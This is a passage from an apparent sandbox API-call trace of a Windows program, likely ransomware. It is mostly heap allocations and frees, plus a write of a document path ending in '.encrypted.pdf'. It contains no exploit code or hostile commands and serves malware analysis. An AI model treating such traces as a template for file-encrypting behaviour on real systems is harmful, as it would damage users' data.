| out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.encrypted.pdf\r\n", lpUsedDefaultChar=0x0) returned 115 [0035.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0035.599] WriteFile (in: hFile=0x128, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x72, lpOverlapped=0x0) returned 1 [0035.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.599] CloseHandle (hObject=0x128) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.600] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.600] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.602] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.602] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.602] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.602] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.602] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.605] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.608] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.608] WideCharToMultiByte (in: CodePage=0x0, 